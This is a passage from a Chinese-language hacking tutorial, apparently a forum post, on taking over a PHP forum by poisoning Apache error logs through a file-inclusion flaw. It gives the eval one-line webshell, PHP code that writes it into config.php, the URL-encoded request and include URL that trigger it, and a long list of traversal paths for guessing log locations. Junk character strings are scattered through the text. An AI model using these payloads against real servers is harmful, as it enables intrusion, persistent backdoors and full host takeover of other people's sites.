因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
" P& P. @, C& \( p. d3 ]7 Q2 _0 T/ E( H# v5 j
比如还是这句一句话木马 6 u. E# I m1 m1 d
<?eval($_POST[cmd]);?>
! R" u% _5 l) ]# [% c! V/ ~; o5 y/ L" J0 @* A2 {3 b+ _
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 4 J J, ]1 U, B
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 0 D/ h+ g y% Y. ~
7 z' J) h' m0 N$ Y, L<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); - S# i; n+ w. V
fclose($fp);?> //在config.php里写入一句木马语句
. ?: ]+ z* E7 K y: ?. m9 `- z; u2 y% b) z6 s
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
) ~5 J& M2 P& b8 K9 R4 K6 Y& L转换为 . X+ g; L! ]/ D# R* A: ]
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
2 q; E( d6 \2 |3 [. Vconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
4 F4 {$ U" i7 s7 {%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B 2 {/ I% e3 q% h* l; N4 t2 p/ e/ S
fclose%28%24fp%29%3B%3F%3E ' S' S K/ i3 `4 V5 {$ _2 ]
我们提交
( `$ e1 R- E$ Z: Ehttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww 5 k( M" K0 E9 a
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp 9 C: O1 b$ `* t. g* o, o
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
l, F) w& o7 T) gcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
* r) f# A2 I) M6 t& g
; E* h2 p" {! C+ [ `6 X1 g4 {/ Q7 \这样就错误日志里就记录下了这行写入webshell的代码。 0 Z) p1 v" x9 y( U# e
我们再来包含日志,提交 6 J$ ?) l4 f) e1 T8 q- |: t0 u
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
1 f3 X$ Y" A" \0 c Q( ?1 m/ M5 P2 j! i0 q H+ \
这样webshell就写入成功了,config.php里就写入一句木马语句 * X8 Q- s( i) Z) E* H
OK. 0 \( l4 v ?& c0 w- E! w
http://www.xxx.com/forum/config.php这个就成了我们的webshell
. _# p; e8 Z: G, p v; D直接用lanker的客户端一连,主机就是你的了。 ! W, S- E% H( t" r0 t! G4 r
! n: G* \& h5 f6 w# c3 T0 U
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 3 d/ K$ [3 [/ R) E: ?
9 G& }/ Z5 ?) \) j( z2 S. T
其他的日志路径,你可以去猜,也可以参照这里。 ; D* P/ j( H. m2 Y0 J. L0 ]
../../../../../../../../../../var/log/httpd/access_log
$ `, Q+ M- P" F3 ~6 j6 s) v../../../../../../../../../../var/log/httpd/error_log
4 z$ }. O3 ?6 t) q. F. t' @../apache/logs/error.log
+ H$ [. p! t# s6 G0 P9 e7 w../apache/logs/access.log _; L$ y# y9 I# x* u/ e$ h" a
../../apache/logs/error.log
$ u3 z- f. n U" |: P../../apache/logs/access.log + ^, R/ \; ]" Y$ }
../../../apache/logs/error.log 2 p+ e) {8 A1 L' r
../../../apache/logs/access.log # O5 V C) v; G2 Z6 F
../../../../../../../../../../etc/httpd/logs/acces_log
) L: h8 v$ B3 F) {4 L../../../../../../../../../../etc/httpd/logs/acces.log
2 `& z" p9 j0 ^2 ?$ f' Z5 `% C../../../../../../../../../../etc/httpd/logs/error_log
2 t3 e2 P0 [+ Q! y, y9 g) [../../../../../../../../../../etc/httpd/logs/error.log
6 c" c, w* Q/ l1 e; k../../../../../../../../../../var/www/logs/access_log : V; `' n- X1 a) ]2 y! b) _* y
../../../../../../../../../../var/www/logs/access.log 9 r* g5 R3 k- c: J1 W2 T
../../../../../../../../../../usr/local/apache/logs/access_log ) v( r" J9 r" l- v% J
../../../../../../../../../../usr/local/apache/logs/access.log
! x P; S- z R& S& E. c../../../../../../../../../../var/log/apache/access_log . A7 e2 }% N0 O. v1 W
../../../../../../../../../../var/log/apache/access.log * L/ H4 I" s2 A( E$ z$ `# O
../../../../../../../../../../var/log/access_log 8 I5 l. B0 R# o2 p
../../../../../../../../../../var/www/logs/error_log
! |+ s# i+ T3 d3 q" g8 y../../../../../../../../../../var/www/logs/error.log
$ T. }% G+ F( ^# u6 X- k0 G../../../../../../../../../../usr/local/apache/logs/error_log ; E, }- L% S! I! G+ ~% v
../../../../../../../../../../usr/local/apache/logs/error.log
$ D4 M; K7 P7 {# Q../../../../../../../../../../var/log/apache/error_log
9 {; x3 L+ F: W# p# d; k../../../../../../../../../../var/log/apache/error.log
# T A$ g2 M3 ^../../../../../../../../../../var/log/access_log
* {1 Y. b$ A# a f+ x I W6 b../../../../../../../../../../var/log/error_log
* s) e+ V! T+ r/var/log/httpd/access_log
+ P6 m" K5 c. p9 Z: Y/var/log/httpd/error_log
9 U# Y( w; e- r1 L( w6 {../apache/logs/error.log
s4 g3 T4 X0 w. D../apache/logs/access.log
* r- [, G1 J, X2 ~) I8 I../../apache/logs/error.log
2 q$ M+ y: V' Q- n' V/ S+ R../../apache/logs/access.log 6 o! y; Y. s4 ]' V0 g
../../../apache/logs/error.log
/ A2 F. e" p k7 I9 Q../../../apache/logs/access.log H @4 l* V) n, s3 n6 C" R) } v0 W
/etc/httpd/logs/acces_log
( z/ d( F( M! W2 ?6 y& m" W" S/etc/httpd/logs/acces.log # u4 B& g0 C c' R
/etc/httpd/logs/error_log + A7 c9 [9 G) {7 n
/etc/httpd/logs/error.log 8 Z' k1 K7 ]' N" [
/var/www/logs/access_log
, d& V M, f. o4 r& L6 K+ @& X- F/var/www/logs/access.log
5 E. p; |1 @0 F2 A9 P/usr/local/apache/logs/access_log
' {# Y/ o t& G3 _4 D. n6 k/usr/local/apache/logs/access.log " z* n' i5 q# P' T2 f- P! T* n
/var/log/apache/access_log
$ D& J) O' {% W) p/var/log/apache/access.log
; c* x: _5 B& u3 u/var/log/access_log * S2 a9 w8 N6 C, v; L: A) o
/var/www/logs/error_log
u0 s9 I% G2 p; N8 K3 k; _7 T/var/www/logs/error.log 1 y% k- B5 f9 A1 Z Y6 a
/usr/local/apache/logs/error_log
- a O9 ~* u. y0 t" E/usr/local/apache/logs/error.log : B) w7 k* s# F \) {6 c- Z
/var/log/apache/error_log
' {, y* w% |4 V$ T* Z6 u- J. R/var/log/apache/error.log " @2 R3 m/ f! L7 B. z6 o) _+ X+ c+ M
/var/log/access_log
+ E; a! K& E. ?: }3 \ R; v/var/log/error_log |